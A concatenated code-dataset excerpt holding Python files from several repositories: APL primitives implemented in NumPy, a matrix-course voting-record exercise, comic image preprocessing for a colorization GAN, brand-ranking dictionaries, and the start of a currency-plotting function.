else:\n idx.append(slice(0, min(axis, b.shape[i]), 1))\n\n if len(idx) == 1:\n idx_t = idx[0]\n else:\n idx_t = tuple(idx) # type: ignore\n\n right[idx_t] = _reshape_singleton(b, tuple(mag_a))[idx_t]\n return right\n \ndef iota(alpha: Optional[np.ndarray|str], omega: np.ndarray) -> np.ndarray:\n if alpha:\n raise NYIError('NYI ERROR: index-of (dyadic iota, a⍳b)')\n\n # Mondadic iota: index generator\n if not _is_int(omega):\n raise DomainError('DOMAIN ERROR: right arg must be integer-valued')\n \n if omega.ndim > 1:\n raise 
RankError(\"RANK ERROR: right arg rank must not be greater than 1\")\n\n if omega.ndim == 0:\n return np.arange(int(omega))\n \n odo = [\n np.array(c)\n for c in itertools.product(*((range(c)) for c in omega))\n ]\n a = np.empty(len(odo), dtype=object)\n a[:] = odo\n return a.reshape(omega)\n\ndef tally(alpha: Optional[np.ndarray], omega: np.ndarray) -> np.ndarray:\n \"\"\"\n Monadic: tally\n Dyadic: not-match\n \"\"\"\n if alpha is None:\n if omega.ndim == 0:\n return np.array(1)\n return np.array(omega.shape[0])\n \n return match(alpha, omega)^1\n\ndef match(alpha: Optional[np.ndarray], omega: np.ndarray) -> np.ndarray:\n \"\"\"\n TODO: check how this works on enclosed items.\n \"\"\"\n if alpha is None:\n raise NotImplementedError('NYI: depth')\n \n if isinstance(alpha, np.ndarray) and isinstance(omega, np.ndarray):\n if alpha.shape != omega.shape:\n return np.array(0)\n return np.array(int(np.all([match(ai, bi) for ai, bi in zip(alpha.flat, omega.flat)])))\n else:\n return np.array(int(alpha == omega))\n \ndef rho(alpha: Optional[np.ndarray|str], omega: np.ndarray) -> np.ndarray:\n \"\"\"\n Monadic ⍴: shape\n Dyadic ⍴: reshape\n \"\"\"\n if alpha is None:\n return np.array(list(omega.shape))\n \n assert isinstance(alpha, np.ndarray)\n bound = math.prod(alpha)\n\n if omega.ndim == 0:\n return np.repeat(omega, bound).reshape(alpha)\n \n # If we already have the right number of elements, we can \n # just reshape the array == fast.\n if math.prod(omega.shape) == bound:\n return omega.reshape(alpha)\n\n # If we don't have the right number of elements, we need to\n # do some fancy itertools dance to repeat elements and/or\n # cut off a few.\n return np.array(list(itertools.islice(itertools.cycle(omega.ravel()), bound))).reshape(alpha)\n \ndef comma(alpha: Optional[np.ndarray], omega: np.ndarray, axis: int = -1) -> np.ndarray:\n \"\"\"\n Mondadic: ravel\n Dyadic: catenate last (trailling axis)\n \"\"\"\n if alpha is None:\n return np.ravel(omega)\n \n if alpha.ndim != omega.ndim:\n if omega.ndim == 0: # Scalar extension\n shape = list(alpha.shape)\n shape[-1] = 1\n return np.concatenate((alpha, omega.repeat(math.prod(shape)).reshape(shape)), axis=axis)\n raise LengthError('LENGTH ERROR')\n\n return np.concatenate((alpha, omega), axis=axis)\n\ndef right_shoe(alpha: Optional[np.ndarray], omega: np.ndarray, axis: int = 0) -> np.ndarray:\n \"\"\"\n Monadic: first/disclose\n Dyadic: pick\n\n Note: APL's enclose and disclose fit poorly with numpy's array model\n \"\"\"\n if alpha is None:\n if omega.ndim == 0: # Disclose\n return arr.disclose(omega)\n return arr.disclose(omega[0]) # First\n\n if omega.ndim == 0:\n raise LengthError('LENGTH ERROR')\n\n if alpha > omega.shape[0]:\n raise LengthError('LENGTH ERROR')\n \n return arr.disclose(omega[alpha]) # Pick\n \ndef left_shoe(alpha: Optional[np.ndarray], omega: np.ndarray, axis: int = 0) -> np.ndarray:\n if axis != 0:\n raise NYIError(\"NYI enclose with axis != 0\")\n if alpha is None:\n return arr.enclose(omega)\n raise NYIError\n\ndef rtack(alpha: Optional[np.ndarray], omega: np.ndarray) -> np.ndarray:\n return omega\n\ndef ltack(alpha: np.ndarray, omega: np.ndarray) -> np.ndarray:\n return alpha\n\ndef plus(alpha: Optional[np.ndarray], omega: np.ndarray) -> np.ndarray:\n if alpha is None:\n return np.conj(omega)\n return alpha + omega\n\ndef minus(alpha: Optional[np.ndarray], omega: np.ndarray) -> np.ndarray:\n if alpha is None:\n return -omega\n return alpha - omega\n\ndef times(alpha: Optional[np.ndarray], omega: np.ndarray) -> np.ndarray:\n 
if alpha is None:\n if omega == 0:\n return np.array(0)\n return omega / abs(omega)\n return alpha * omega\n\ndef divide(alpha: Optional[np.ndarray], omega: np.ndarray) -> np.ndarray:\n if alpha is None:\n return 1 / omega\n return alpha / omega\n \ndef replicate(alpha: Optional[np.ndarray], omega: np.ndarray) -> np.ndarray:\n \"\"\"\n Replicate (trailling)\n \"\"\"\n if alpha is None:\n raise SyntaxError('SYNTAX ERROR')\n\n return np.repeat(omega, alpha)\n\ndef replicate_first(alpha: Optional[np.ndarray], omega: np.ndarray, axis=None) -> np.ndarray:\n \"\"\"\n Replicate (leading)\n \"\"\"\n if alpha is None:\n raise SyntaxError('SYNTAX ERROR')\n\n return np.repeat(omega, alpha, axis=0)\n\ndef gets(alpha: str, omega: np.ndarray|Callable) -> Optional[np.ndarray]:\n Env.set(alpha, omega)\n if not callable(omega):\n return omega\n return None\n\ndef reduce(left: np.ndarray|Callable, right: Optional[np.ndarray|Callable], alpha: Optional[np.ndarray], omega: np.ndarray) -> np.ndarray:\n \"\"\"\n Outward-facing '/' (trailling axis reduce)\n \"\"\"\n if right is not None:\n raise ArityError(\"'/' takes no right operand\")\n\n if alpha is not None:\n raise NYIError(\"left argument for function derived by '/' is not implemented yet\")\n\n assert callable(left)\n return arr.foldr(omega, operand=left, axis=omega.ndim-1)\n\ndef reduce_first(left: np.ndarray|Callable, right: Optional[np.ndarray|Callable], alpha: Optional[np.ndarray], omega: np.ndarray) -> np.ndarray:\n \"\"\"\n Outward-facing '⌿' (leading axis reduce)\n \"\"\"\n if right is not None:\n raise ArityError(\"'⌿' takes no right operand\")\n\n if alpha is not None:\n raise NYIError(\"left argument for function derived by '⌿' is not implemented yet\")\n\n assert callable(left)\n return arr.foldr(omega, operand=left, axis=0)\n\ndef fun_gets(left: np.ndarray|Callable, right: Optional[np.ndarray|Callable], alpha: Optional[np.ndarray|str], omega: np.ndarray) -> np.ndarray:\n \"\"\"\n a F← b\n \"\"\"\n if right is not None:\n raise SyntaxError(\"SYNTAX ERROR: 'gets' takes no right operand\")\n\n if left is None:\n raise SyntaxError(\"SYNTAX ERROR: 'gets' expects a left operand\")\n\n if alpha is None:\n raise SyntaxError(\"SYNTAX ERROR: function derived by 'f←' takes a left argument\")\n\n if not callable(left):\n raise SyntaxError(\"SYNTAX ERROR: 'f←' expects a function operand f\")\n\n assert isinstance(omega, np.ndarray)\n assert type(alpha) == str\n\n return Env.amend(alpha, left, omega)\n\ndef each(left: np.ndarray|Callable, right: Optional[np.ndarray|Callable], alpha: Optional[np.ndarray], omega: np.ndarray) -> np.ndarray:\n \"\"\"\n Each ¨ - monadic operator deriving monad\n \"\"\"\n if right is not None:\n raise SyntaxError(\"SYNTAX ERROR: 'each' takes no right operand\")\n\n if left is None:\n raise SyntaxError(\"SYNTAX ERROR: 'each' expects a left operand\")\n\n if alpha is not None:\n raise SyntaxError(\"SYNTAX ERROR: function derived by 'each' takes no left argument\")\n\n if not callable(left):\n raise SyntaxError(\"SYNTAX ERROR: 'each' expects a function operand\")\n\n assert isinstance(omega, np.ndarray)\n\n return np.array([left(o) for o in omega]) # apply left operand to each element\n \ndef transpose(alpha: Optional[np.ndarray], omega: np.ndarray) -> np.ndarray:\n if alpha is None:\n return np.transpose(omega)\n \n # Note 1: NumPy's transpose does not work with repeated axes.\n # We can hardwire the simple case of all axes == 0 to give\n # us a diagonal.\n\n if alpha.ndim == 1 and np.all(alpha == alpha[0]):\n if alpha[0] != 0:\n 
raise NYIError('NYI ERROR: transpose with repeated axes ≠ 0')\n return np.diagonal(omega)\n \n if alpha.ndim > 1:\n raise LengthError('LENGTH ERROR')\n \n # Note: numpy's axis spec for dyadic transpose is NOT the same \n # as APL's: we need the grade permutation of the axes.\n return np.transpose(omega, axes=np.argsort(alpha))\n\ndef grade_up(alpha: Optional[np.ndarray], omega: np.ndarray) -> np.ndarray:\n if alpha:\n raise NYIError('NYI ERROR: dyadic ⍋')\n \n if omega.ndim == 0:\n raise RankError('RANK ERROR')\n \n if omega.ndim == 1:\n return np.argsort(omega)\n \n if omega.ndim == 2:\n return np.lexsort(omega.T[::-1])\n \n raise NYIError('NYI ERROR: ⍋ for rank > 2')\n\ndef grade_down(alpha: Optional[np.ndarray], omega: np.ndarray) -> np.ndarray:\n if alpha:\n raise NYIError('NYI ERROR: dyadic ⍒')\n \n if omega.ndim == 0:\n raise RankError('RANK ERROR')\n \n if omega.ndim == 1:\n return np.argsort(omega)[::-1]\n \n if omega.ndim == 2:\n return np.lexsort(omega.T[::-1])[::-1]\n \n raise NYIError('NYI ERROR: ⍒ for rank > 2')\n\ndef encode(alpha: Optional[np.ndarray], omega: np.ndarray) -> np.ndarray:\n if alpha is None:\n raise SyntaxError('SYNTAX ERROR: The function ⊤ requires a left argument')\n return np.array(np.unravel_index(omega, alpha))\n\ndef _decode(shape: np.ndarray, coords: np.ndarray) -> int:\n \"\"\"\n Decode -- dyadic ⊥, aka `base`\n\n Evaluates `coords` in terms of the radix system defined by `shape`.\n \n Inverse of `encode()`\n\n https://aplwiki.com/wiki/Decode\n https://xpqz.github.io/cultivations/Decode.html\n\n \"\"\"\n pos = 0\n rnk = len(shape)\n for axis in range(rnk):\n if axis >= len(coords):\n return pos\n pos += coords[axis]\n if axis != rnk - 1:\n pos *= shape[axis+1]\n return pos\n\ndef decode(alpha: np.ndarray, omega: np.ndarray) -> np.ndarray:\n \"\"\"\n Decode - dyadic ⊥\n\n See https://aplwiki.com/wiki/Decode\n https://xpqz.github.io/cultivations/Decode.html\n https://help.dyalog.com/latest/index.htm#Language/Primitive%20Functions/Decode.htm\n\n 2 ⊥ 1 1 0 1\n \n 13\n\n 24 60 60 ⊥ 2 46 40\n\n 10000\n\n Note that we're really doing an inner product:\n\n (4 3⍴1 1 1 2 2 2 3 3 3 4 4 4)⊥3 8⍴0 0 0 0 1 1 1 1 0 0 1 1 0 0 1 1 0 1 0 1 0 1 0 1\n ┌→──────────────────┐\n ↓0 1 1 2 1 2 2 3│\n │0 1 2 3 4 5 6 7│\n │0 1 3 4 9 10 12 13│\n │0 1 4 5 16 17 20 21│\n └~──────────────────┘\n\n Dyalog's docs say:\n\n R←X⊥Y\n\n Y must be a simple numeric array. X must be a simple numeric array. R is the \n numeric array which results from the evaluation of Y in the number system with radix X.\n\n X and Y are conformable if the length of the last axis of X is the same as the length \n of the first axis of Y. A scalar or 1-element vector is extended to a vector of the \n required length. If the last axis of X or the first axis of Y has a length of 1, the \n array is extended along that axis to conform with the other argument.\n\n The shape of R is the catenation of the shape of X less the last dimension with the \n shape of Y less the first dimension. That is:\n\n ⍴R ←→ (¯1↓⍴X),1↓⍴Y\n\n For vector arguments, each element of X defines the ratio between the units for corresponding \n pairs of elements in Y. 
The first element of X has no effect on the result.\n\n \"\"\"\n if alpha.ndim == 0: # Extend left scalar\n return np.array(np.ravel_multi_index(omega, alpha.repeat(len(omega)))) # type: ignore\n\n if omega.ndim == 0: # A right scalar might need to be extended, too\n return np.array(np.ravel_multi_index(omega.repeat(len(alpha), alpha))) # type: ignore\n \n # If the last axis of left or the first axis of right has a length of 1, this \n # array is extended along that axis to conform with the other argument.\n if alpha.shape[-1] == 1:\n left = np.repeat(alpha, omega.shape[0], axis=-1)\n else:\n left = alpha\n\n if omega.shape[0] == 1:\n right = np.repeat(omega, alpha.shape[-1], axis=0)\n else:\n right = omega\n\n if left.shape[-1] != right.shape[0]:\n raise RankError('RANK ERROR')\n \n if left.ndim == right.ndim == 1:\n return np.array(np.ravel_multi_index(right, left)) # type: ignore\n \n # At least one side is higher-rank; we're doing an inner product\n shape = left.shape[:-1] + right.shape[1:]\n if left.ndim == 1: # Treat vector as 1-row matrix, wtf Dyalog\n left.reshape((1, left.shape[0]))\n\n ravel = []\n for lc in arr.major_cells(left):\n for rc in arr.major_cells(right.T):\n decoded = _decode(lc, rc)\n ravel.append(decoded)\n\n return np.array(ravel).reshape(shape)\n\ndef roll_deal(alpha: Optional[np.ndarray], omega: np.ndarray) -> np.ndarray:\n rng = np.random.default_rng()\n\n if alpha is None: # Roll (monadic ?)\n if not _is_int(omega) or np.any(omega < 0):\n raise DomainError('DOMAIN ERROR: Roll right argument must consist of non-negative integer(s)')\n roll = rng.random(size=omega.shape)\n ints = (omega*roll).astype(int)\n return np.where(omega == 0, rng.random(), ints)\n \n # Deal (dyadic ?)\n\n # Y must be a simple scalar or 1-element vector containing a non-negative \n # integer. X must be a simple scalar or 1-element vector containing a \n # non-negative integer and X≤Y.\n if omega.ndim > 1 or omega.ndim == 1 and len(omega) != 1:\n raise LengthError('LENGTH ERROR: right arg must be non-negative integer scalar or singleton')\n if alpha.ndim > 1 or alpha.ndim == 1 and len(alpha) != 1:\n raise LengthError('LENGTH ERROR: left arg must be non-negative integer scalar or singleton')\n \n deal = omega if omega.ndim == 0 else omega[0]\n if deal < 0:\n raise DomainError('DOMAIN ERROR: Deal right argument must be non-negative')\n count = alpha if alpha.ndim == 0 else alpha[0]\n if count < 0:\n raise DomainError('DOMAIN ERROR: Deal left argument must be non-negative')\n if count > deal:\n raise DomainError('DOMAIN ERROR: Deal left argument must be less than or equal to right argument')\n\n # R is an integer vector obtained by making X random selections from ⍳Y \n # without repetition. \n return np.random.choice(deal, count, replace=False)\n\ndef tilde(alpha: Optional[np.ndarray], omega: np.ndarray) -> np.ndarray:\n if alpha is None:\n if not _is_int(omega) or not _is_bool(omega):\n raise DomainError('DOMAIN ERROR: right argument must be Boolean array')\n return omega ^ 1\n else:\n if alpha.ndim > 1: # Left must not exceed rank 1. Right will be ravelled.\n raise RankError('RANK ERROR: left argument must be a scalar or vector')\n return np.setdiff1d(alpha, np.ravel(omega), assume_unique=True)\n\ndef nyi(alpha: Optional[np.ndarray], omega: np.ndarray) -> np.ndarray: # type: ignore\n raise NYIError('NYI ERROR')\n\nclass Voc:\n \"\"\"\n Voc is the global vocabulary of built-in arrays, functions and operators. 
This class should not\n be instantiated.\n \"\"\"\n\n arrs: dict[str, np.ndarray] = {\n '⍬': np.array([], dtype=int),\n '⎕IO': np.array(0),\n '⎕A': np.array(ascii_letters[26:]),\n '⎕D': np.arange(10)\n }\n\n funs: dict[str, Callable] = {\n '↑': lambda a, w: uparrow(Env.resolve(a), Env.resolve(w)),\n '≢': lambda a, w: tally(Env.resolve(a), Env.resolve(w)),\n '≡': lambda a, w: match(Env.resolve(a), Env.resolve(w)),\n '⍳': lambda a, w: iota(Env.resolve(a), Env.resolve(w)),\n '⊂': lambda a, w: left_shoe(Env.resolve(a), Env.resolve(w)),\n '⊃': lambda a, w: right_shoe(Env.resolve(a), Env.resolve(w)),\n ',': lambda a, w: comma(Env.resolve(a), Env.resolve(w)),\n '⍴': lambda a, w: rho(Env.resolve(a), Env.resolve(w)),\n '⊢': lambda a, w: rtack(Env.resolve(a), Env.resolve(w)),\n '⊣': lambda a, w: ltack(Env.resolve(a), Env.resolve(w)),\n '+': lambda a, w: plus(Env.resolve(a), Env.resolve(w)),\n '-': lambda a, w: minus(Env.resolve(a), Env.resolve(w)),\n '×': lambda a, w: times(Env.resolve(a), Env.resolve(w)),\n '÷': lambda a, w: divide(Env.resolve(a), Env.resolve(w)),\n '⍉': lambda a, w: transpose(Env.resolve(a), Env.resolve(w)),\n '⍋': lambda a, w: grade_up(Env.resolve(a), Env.resolve(w)),\n '⍒': lambda a, w: grade_down(Env.resolve(a), Env.resolve(w)),\n '⊤': lambda a, w: encode(Env.resolve(a), Env.resolve(w)),\n '⊥': lambda a, w: decode(Env.resolve(a), Env.resolve(w)),\n '?': lambda a, w: roll_deal(Env.resolve(a), Env.resolve(w)),\n '~': lambda a, w: tilde(Env.resolve(a), Env.resolve(w)),\n }\n\n hybs: dict[str, tuple[Callable, Callable]] = {\n '/': (replicate, reduce),\n '⌿': (replicate_first, reduce_first),\n '←': (gets, fun_gets),\n }\n \n mops: dict[str, Callable] = {\n '¨': each,\n '⌸': nyi,\n '⍨': nyi\n }\n\n dops: dict[str, Callable] = {\n '⍤': nyi,\n '⍣': nyi,\n '⌺': nyi,\n '@': nyi,\n '⍥': nyi,\n }\n\n @classmethod\n def has_builtin(cls, f: str) -> bool:\n return f in cls.funs\n\n @classmethod\n def get_fn(cls, f: str) -> Callable:\n \"\"\"\n Lookup a function from the global symbol table\n \"\"\"\n try:\n return cls.funs[f]\n except KeyError:\n raise ValueError(f\"VALUE ERROR: Undefined function: '{f}'\")\n\n @classmethod\n def get_mop(cls, mop: str) -> Callable:\n try:\n return cls.mops[mop]\n except KeyError:\n raise ValueError(f\"VALUE ERROR: Undefined monadic operator: '{mop}'\")\n\n @classmethod\n def get_dop(cls, dop: str) -> Callable:\n try:\n return cls.dops[dop]\n except KeyError:\n raise ValueError(f\"VALUE ERROR: Undefined dyadic operator: '{dop}'\")\n\n @classmethod\n def get_hyb(cls, hyb: str) -> tuple[Callable, Callable]:\n try:\n return cls.hybs[hyb]\n except KeyError:\n raise ValueError(f\"VALUE ERROR: Undefined hybrid: '{hyb}'\")","repo_name":"xpqz/numpapl","sub_path":"primitives.py","file_name":"primitives.py","file_ext":"py","file_size_in_byte":23421,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"38631212182","text":"from vec import Vec\nfrom triangular import *\n\n# Exercise 2.11.4\nD = {0, 1, 2}\nrowlist = [Vec(D, {0:1, 1:3, 2:2}), Vec(D, {1:2, 2:4}), Vec(D, {2:-10})]\nb = [7,4,12]\nans = triangular_solve_n(rowlist, b)\n#print(ans)\n\n# Section 2.11.5\nlabel_list = ['a','b','c','d']\nD = set(label_list)\nrowlist=[Vec(D,{'a':4, 'b':-2,'c':0.5,'d':1}), Vec(D,{'b':2,'c':3,'d':3}),\n Vec(D,{'c':5, 'd':1}), Vec(D,{'d':2.})]\nb = [6, -4, 3, -8]\nans = triangular_solve(rowlist, label_list, b)\n#print(ans)\n\n# Section 2.12 Lab: Comparing voting records using dot-product\n# Task 2.12.1\ndef 
create_voting_dict(strlist):\n dct = dict()\n for ent in strlist:\n a = ent.split(' ')\n votes = list()\n for i in range(3, len(a)):\n votes.append(int(a[i]))\n dct[a[0]] = votes\n return dct\n\nvoting_dict = create_voting_dict(list(open('voting_record_dump109.txt')))\n#print(len(voting_dict))\n#print(voting_dict)\n\n# Task 2.12.2\ndef policy_compare(sen_a, sen_b, voting_dict):\n return sum([a*b for (a,b) in zip(voting_dict[sen_a], voting_dict[sen_b])])\n\ndot = policy_compare('Brownback', 'Murray', voting_dict)\nprint(dot)\ndot = policy_compare('Roberts', 'Rockefeller', voting_dict)\nprint(dot)\n\n# Task 2.12.3\ndef most_similar(sen, voting_dict):\n most = -100\n nm = ''\n for k in voting_dict.keys():\n dot = policy_compare(sen, k, voting_dict)\n if sen != k and dot > most:\n most = dot\n nm = k\n return nm\n\nprint(most_similar('Akaka', voting_dict))\n\n# Task 2.12.4\ndef least_similar(sen, voting_dict):\n least = 100\n nm = ''\n for k in voting_dict.keys():\n dot = policy_compare(sen, k, voting_dict)\n if sen != k and dot < least:\n least = dot\n nm = k\n return nm\n\nprint(least_similar('Akaka', voting_dict))\n\n\n# sum of vectors\n\nv1 = Vec({'a','b','c'}, {'a':1,'b':2,'c':3})\nv2 = Vec({'a','b','c'}, {'a':2,'b':3,'c':4})\nprint(sum({2*v1,v2}))","repo_name":"ginuerzh/codingthematrix","sub_path":"vector/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"35953440922","text":"import cv2\r\nimport os\r\nimport numpy as np\r\nimport train.train_LRC\r\n\r\nclass Preprossesor :\r\n def __init__(self, comic_name):\r\n self.dir_path = os.path.join(os.path.dirname(__file__), comic_name)\r\n raw_data_path = os.path.join(self.dir_path, 'raw')\r\n path_list = os.listdir(raw_data_path)\r\n path_list.sort()\r\n self.path_list = [os.path.join(raw_data_path, x) for x in path_list]\r\n\r\n self.resized_data_path = os.path.join(self.dir_path, 'resized')\r\n if not os.path.exists(self.resized_data_path):\r\n os.makedirs(self.resized_data_path)\r\n\r\n self.edged_data_path = os.path.join(self.dir_path, 'edge')\r\n if not os.path.exists(self.edged_data_path):\r\n os.makedirs(self.edged_data_path)\r\n\r\n self.LRGT_data_path = os.path.join(self.dir_path, 'LRGT')\r\n if not os.path.exists(self.LRGT_data_path):\r\n os.makedirs(self.LRGT_data_path)\r\n\r\n\r\n def preprocess_save(self):\r\n for path in self.path_list:\r\n img = cv2.imread(path)\r\n ######################################################################################\r\n img_resized = cv2.resize(img[75:-75, :, :], (256, 256),interpolation = cv2.INTER_LINEAR)\r\n ######################################################################################\r\n ######################################################################################\r\n mask = np.mean(img, axis=2) < 80\r\n outline = (cv2.Canny(img, 100, 180) / 255).astype(np.bool)\r\n outline = np.logical_not(np.logical_or(outline, mask)).astype(np.uint8) * 255\r\n outline = cv2.resize(outline[75:-75, :], (256, 256),interpolation = cv2.INTER_AREA)\r\n ######################################################################################\r\n ######################################################################################\r\n img_LRGT = cv2.resize(img_resized, (32, 32), interpolation=cv2.INTER_LINEAR)\r\n img_LRGT = cv2.resize(img_LRGT, (256, 256), interpolation=cv2.INTER_LINEAR)\r\n 
######################################################################################\r\n\r\n\r\n file_name = path[path.find('raw') + 5:]\r\n resized_path = os.path.join(self.resized_data_path, file_name)\r\n edged_path = os.path.join(self.edged_data_path, file_name)\r\n LRGT_path = os.path.join(self.LRGT_data_path, file_name)\r\n\r\n cv2.imwrite(resized_path, img_resized)\r\n cv2.imwrite(edged_path, outline)\r\n cv2.imwrite(LRGT_path, img_LRGT)\r\n\r\n\r\n#\r\n# P = Preprossesor('yumi_cell')\r\n# P.preprocess_save()\r\n#\r\n# P = Preprossesor('more_data')\r\n# P.preprocess_save()\r\n\r\n\r\n# data_maker = train.train_LRC.CGAN(20, input_dir = \"test\") #반드시 LRC가 학습된 뒤에 실행\r\n# data_maker.make_data_for_BD(2,2, start=0, end = 1000)\r\n# data_maker = train.train_LRC.CGAN(20, input_dir = \"yumi_cell\") #반드시 LRC가 학습된 뒤에 실행\r\n# data_maker.make_data_for_BD(2,2, start=0, end = 7380)\r\ndata_maker = train.train_LRC.CGAN(20, input_dir = \"more_data\") #반드시 LRC가 학습된 뒤에 실행\r\ndata_maker.make_data_for_BD(2,2, start=0, end = 5900)","repo_name":"demul/auto_colorization_project","sub_path":"naive_two_step_CGAN/data_preprocessing.py","file_name":"data_preprocessing.py","file_ext":"py","file_size_in_byte":3262,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"45"} +{"seq_id":"3231925848","text":"brand_dict_reps = {\n \"Colgate\" : [\"CP_News\",\"Colgate\"], \n \"Danone\" : [\"DanoneCanada\",\"Danone\"],\n \"Cartier\" : [\"Cartier\",\"Fond_Cartier\"],\n \"Ferrari\" : [\"Ferrari\",\"ScuderiaFerrari\"],\n \"Santander\" : [\"SantanderUSA\",\"SantanderBankUS\",\"bancosantander\"],\n \"Dior\" : [\"Dior\"],\n \"Kellogg’s\" : [\"KelloggsCareers\",\"KelloggsUS\",\"KelloggCompany\"],\n \"FedEx\" : [\"FedExOffice\",\"FedExHelp\",\"FedEx\",\"FedExCanada\"],\n \"Corona\" : [\"coronacanada\",\"CoronaUSA\",\"corona\"],\n \"LinkedIn\" : [\"LinkedInMktg\",\"LinkedInHelp\",\"LinkedIn\"],\n \"DHL\" : [\"DHLGlobal\",\"DHLCanadaHelp\",\"DHLUS\"],\n \"Caterpillar\" : [\"CaterpillarInc\"],\n \"Xiaomi\" : [\"XiaomiUSA\",\"Xiaomi\"], \n \"Jack Daniel’s\" : [\"JackDaniels_US\"],\n \"Huawei\" : [\"HuaweiUSA\",\"Huawei_devs\",\"Huawei\"],\n \"Kia\" : [\"Kia\",\"Kia_Worldwide\",\"KiaCanada\"],\n \"Tiffany & Co.\" : [\"TiffanyAndCo\"],\n \"Prada\" : [\"FondazionePrada\",\"Prada\"],\n \"Hewlett Packard Enterprise\" : [\"HPE\",\"HPE_OEM\"],\n \"Panasonic\" : [\"Panasonic_mob\",\"PanasonicNA\",\"panasonic\"],\n \"Johnson & Johnson\" : [\"JNJNews\"],\n \"Hennessy\" : [\"Hennessy\",\"MoetHennessy\"],\n \"KFC\" : [\"kfc_canada\",\"TellTheColonel\",\"kfc\"],\n \"Heineken\" : [\"HeinekenCA\",\"Heineken_Exp\",\"Heineken_US\",\"Heineken\"],\n \"Burberry\" : [\"BurberryCorp\",\"Burberry\"],\n \"Canon\" : [\"CanonCanada\",\"CanonUSApro\",\"CanonUSAimaging\",\"CanonUSABiz\",\"CanonUSA\"],\n \"Land Rover\" : [\"LandRoverCanada\",\"jaguarlandrover\",\"LandRoverUSA\",\"LandRover\"],\n \"MINI\" : [\"MINIUSA\",\"MINICanada\",\"MINI\"],\n \"Sephora\" : [\"Sephora\"],\n }\n\nbrand_dict_ft = {\n \"Colgate\" : [\"72\",\"10,130\",\"+5%\",\"DOWN 4 PLACES\"],\n \"Danone\" : [\"73\",\"9,528\",\"-3%\",\"DOWN 8 PLACES\"],\n \"Cartier\" : [\"74\",\"9,521\",\"+17%\",\"DOWN 1 PLACE\"],\n \"Ferrari\" : [\"75\",\"9,365\",\"+31%\",\"UP 1 PLACE\"],\n \"Santander\" : [\"76\",\"9,015\",\"+11%\",\"DOWN 2 PLACES\"],\n \"Dior\" : [\"77\",\"8,919\",\"+27%\",\"RANK UNCHANGED\"],\n \"Kellogg’s\" : [\"78\",\"8,747\",\"+1%\",\"DOWN 6 PLACES\"],\n \"FedEx\" : [\"79\",\"8,166\",\"+8%\",\"DOWN 4 PLACES\"],\n \"Corona\" : 
[\"80\",\"7,764\",\"+12%\",\"DOWN 2 PLACES\"],\n \"LinkedIn\" : [\"81\",\"7,595\",\"+19%\",\"UP 2 PLACES\"],\n \"DHL\" : [\"82\",\"7,518\",\"+11%\",\"DOWN 2 PLACES\"],\n \"Caterpillar\" : [\"83\",\"7,397\",\"+14%\",\"DOWN 1 PLACE\"],\n \"Xiaomi\" : [\"84\",\"7,326\",\"NEW\",\"NEW\"],\n \"Jack Daniel’s\" : [\"85\",\"7,171\",\"+10%\",\"DOWN 4 PLACES\"],\n \"Huawei\" : [\"86\",\"6,634\",\"+7%\",\"DOWN 1 PLACE\"],\n \"Kia\" : [\"87\",\"6,612\",\"+9%\",\"DOWN 1 PLACE\"],\n \"Tiffany & Co.\" : [\"88\",\"6,552\",\"+19%\",\"UP 4 PLACES\"],\n \"Prada\" : [\"89\",\"6,548\",\"+21%\",\"UP 5 PLACES\"],\n \"Hewlett Packard Enterprise\" : [\"90\",\"6,486\",\"+3%\",\"DOWN 6 PLACES\"],\n \"Panasonic\" : [\"91\",\"6,337\",\"+9%\",\"DOWN 3 PLACES\"],\n \"Johnson & Johnson\" : [\"92\",\"6,130\",\"+3%\",\"DOWN 5 PLACES\"],\n \"Hennessy\" : [\"93\",\"6,111\",\"+15%\",\"UP 2 PLACES\"],\n \"KFC\" : [\"94\",\"6,089\",\"+12%\",\"DOWN 1 PLACE\"],\n \"Heineken\" : [\"95\",\"6,003\",\"+5%\",\"DOWN 6 PLACES\"],\n \"Burberry\" : [\"96\",\"5,917\",\"+14%\",\"UP 1 PLACE\"],\n \"Canon\" : [\"97\",\"5,828\",\"-15%\",\"DOWN 18 PLACES\"],\n \"Land Rover\" : [\"98\",\"5,593\",\"+10%\",\"RANK UNCHANGED\"],\n \"MINI\" : [\"99\",\"5,579\",\"+7%\",\"DOWN 3 PLACES\"],\n \"Sephora\" : [\"100\",\"5,491\",\"+19%\",\"RANK UNCHANGED\"],\n }\n","repo_name":"sets018/branding_nlp_project","sub_path":"data scrapping/accounts info/dicts_03.py","file_name":"dicts_03.py","file_ext":"py","file_size_in_byte":3685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"4540465524","text":"##FUNCION GRAFICA LA SERIE LARGA DEL MKT CAP EN USD\r\ndef paint_currency(ticker, puntos):\r\n ### GRAFICA LOS ULTIMOS N puntos del tipo de cambio\r\n ### Si el indice esta en formato datetime, al correr este codigo las fechas aparecen en el eje x automaticamente\r\n global df, cur\r\n #\r\n # ABRE EL DATAFRAME DE CURRENCIES\r\n #\r\n open_file_currency(ticker)\r\n #\r\n df = cur\r\n #\r\n #\r\n # VERIFICA SI LA SERIE ES UN TIPO DE CAMBIO REAL O NOMINAL\r\n if ticker == \"USDARS_BCRA\": \r\n serie = \"tc_nominal\"\r\n tipo_de_cambio = \"nominal\"\r\n elif ticker == \"USDARS_LIBRE\":\r\n serie = \"tc_nominal\"\r\n tipo_de_cambio = \"nominal\"\r\n elif ticker == \"USDARS_PPP\":\r\n serie = \"tc_real\"\r\n tipo_de_cambio = \"bilateral real\"\r\n else:\r\n serie = \"tc_nominal\"\r\n tipo_de_cambio = \"nominal\"\r\n #\r\n # Calcula las Moving Average y los suma a la df\r\n #\r\n if serie == \"tc_nominal\":\r\n df[\"MA200\"] = df.tc_nominal.rolling(200).mean()\r\n df[\"MA100\"] = df.tc_nominal.rolling(100).mean()\r\n df[\"MA50\"] = df.tc_nominal.rolling(50).mean()\r\n df[\"MA25\"] = df.tc_nominal.rolling(25).mean()\r\n elif serie == \"tc_real\":\r\n df[\"MA200\"] = df.tc_real.rolling(200).mean()\r\n df[\"MA100\"] = df.tc_real.rolling(100).mean()\r\n df[\"MA50\"] = df.tc_real.rolling(50).mean()\r\n df[\"MA25\"] = df.tc_real.rolling(25).mean()\r\n else:\r\n print (\"Problema con 